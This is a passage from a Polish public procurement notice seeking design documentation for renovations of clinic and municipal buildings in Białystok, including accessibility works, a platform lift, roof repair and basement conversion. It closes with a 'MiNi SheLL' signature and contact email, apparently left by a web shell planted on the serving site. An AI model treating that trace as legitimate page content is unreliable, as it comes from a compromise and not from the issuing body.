-	wymiana  starych okien z ujednoliceniem wymiarów i podmurowaniem  z  możliwością przeniesienia grzejników  pod okna przy modernizacji instalacji c.o.
-	wymianę  stolarki drzwiowej ( pozostałej)
-	ocieplenie ścian zewnętrznych  piwnic budynku warstwą izolacji termicznej,
-	ocieplenie ścian zewnętrznych części nadziemnej budynku warstwą izolacji termicznej, tynk baranek o uziarnieniu 2,00mm,
-	remont częściowy obróbek blacharskich
-	wymiana podokienników zewnętrznych
-	naprawa pokrycia i malowanie konstrukcji daszka nad tarasem I piętra
-	wykonaniu zadaszeń nad drzwiami wejściowymi szt. 3 na elewacji północnej
-	w przypadku konieczności ( na podstawie obliczeń i obowiązujących przepisów) zaprojektowanie instalacji odgromowej budynku
budynku wg załączonych elewacji ( załączniki nr 4-7) .
Dane techniczne budynku: 
Pow. zabudowy        648 m2
Pow. użytkowa      1 285 m2
Kubatura                5 693 m3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.22.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Opracowanie dokumentacji projektowej na wykonanie remontu korytarzy i toalety z przystosowaniem dla osób niepełnosprawnych na I piętrze budynku przychodni przy ul. Piłsudskiego 4a w Białymstoku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE VI     - opracowanie dokumentacji projektowej na wykonanie remontu korytarzy i toalety z przystosowaniem dla osób  niepełnosprawnych na I piętrze budynku przychodni przy  ul. Piłsudskiego 4a   obejmującej:
-	remont korytarza prowadzącego do windy dla osób niepełnosprawnych z wymianą posadzki na płytki gresowe z wylewkami i niezbędnymi pracami malarskimi,
-	wymiana drzwi  z poszerzeniem otworu przy klatce schodowej szt. 2
-	przebudowę istniejącej toalety z rozbiórką ścianek działowych i przystosowaniem dla osób niepełnosprawnych  w zakresie robót budowlanych oraz instalacji sanitarnych i elektrycznych
w zakresie oznaczonym na rzucie piętra budynku  ( załącznik nr 8)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.22.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Opracowanie dokumentacji projektowej na wykonanie remontu dachu i wnętrz ogólnodostępnych tj. klatki schodowej, korytarzy, sanitariatów i dwóch pomieszczeń na  I piętrze przy ul. Sienkiewicza 22 w Białymstoku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE VII    - opracowanie dokumentacji projektowej na wykonanie remontu dachu i wnętrz ogólnodostępnych tj. klatki schodowej, korytarzy, sanitariatów i dwóch pomieszczeń na I piętrze w budynku przy ul. Sienkiewicza 22 wraz z pozwoleniem konserwatora zabytków i pozwoleniem na budowę na działce nr 1452/1.
Zakres robót remontowych: 
-	naprawa pokrycia dachu z blachy ocynkowanej z wymianą obróbek blacharskich  i  remontem kominów,
-	remont klatki schodowej głównej
-	remont korytarzy I i II piętra
-	remont sanitariatów ogólnodostępnych na I i II piętrze
-	remont pomieszczeń nr 4 i 5 na I piętrze budynku
-	uporządkowanie oprzewodowania istniejących instalacji elektroenergetycznych i teletechnicznych w remontowanych pomieszczeniach
-	w przypadku konieczności ( na podstawie obliczeń i obowiązujących przepisów) zaprojektowanie instalacji odgromowej budynku
      Dane techniczne budynku:                                                                                                                                                                 
Pow. zabudowy       304  m2
Kubatura               5 796 m3
zakres remontów wnętrz oznaczony na rzutach (załączniki nr 9-12).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.22.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 50.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Opracowanie dokumentacji projektowej na  przebudowę schodów wejścia głównego z montażem platformy przychodni lekarskiej przy ul. Bema 2 w Białymstoku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE VIII -  opracowanie dokumentacji projektowej na dostosowanie do potrzeb osób niepełnosprawnych wejścia głównego t.j. montaż platformy-podnośnika   wraz  z  przebudową  schodów do budynku użytkowego Przychodni Lekarskiej przy ul. gen. J. Bema 2  wraz z pozwoleniem na budowę położonego na działce o Nr geodezyjnym 845/3 obręb 11 w Białymstoku.

1. Wykonanie projektu budowlano-wykonawczego wraz z uzyskaniem decyzji  o pozwoleniu na  budowę na zadanie j.w.( załącznik nr 13-14)
    - przebudowa zewnętrznych schodów głównego wejścia od strony ul. Bema,
    - zmiana lokalizacji balustrad na rampie,
    - wykonanie zadaszenia nad wejściem od strony ul. Cieszyńskiej. 
  
2.  Wykonanie projektu montażu platformy-podnośnika  i prac towarzyszących.
     Wymagania dla platformy-podnośnika;
-	bez szybu, podszybia i oddzielnego pomieszczenia na urządzenie napędowe,
-	zabezpieczenia gwarantujące bezpieczną pracę urządzenia,
-	prosta obsługa, do samodzielnej obsługi przez osobę niepełnosprawną,
-	zabezpieczenie przed zjechaniem wózka z urządzenia podczas podnoszenia,
-	wysokość podnoszenia do 1,5 m
-	udźwig do 300 kg,
-	wymiary platformy - do uzgodnienia,
-	kierunek wjazdu - wyjazdu  - do uzgodnienia,
-	napęd elektro-hydrauliczny,
-	możliwość pracy  bez osłony przed warunkami atmosferycznymi,
-	bezawaryjna praca,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.22.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 75.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Opracowanie dokumentacji projektowej na zmianę sposobu użytkowania pomieszczeń w piwnicy budynku przy ul. Suraskiej 1 w Białymstoku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE IX - opracowanie dokumentacji projektowej zmiany sposobu użytkowania pomieszczeń użytkowych w piwnicy budynku przy ul. Suraskiej 1 w Białymstoku obejmującej:
-	zmianę przeznaczenia  pomieszczeń na szatnie i pomieszczenia gospodarcze wraz z robotami branżowymi 
Dane techniczne:
powierzchnia użytkowa 162 m2
kubatura                        373 m3
zakres remontów  oznaczony na rzutach (załączniki nr 15-16) z wszelkimi uzgodnieniami do pozwolenia na budowę..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.22.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com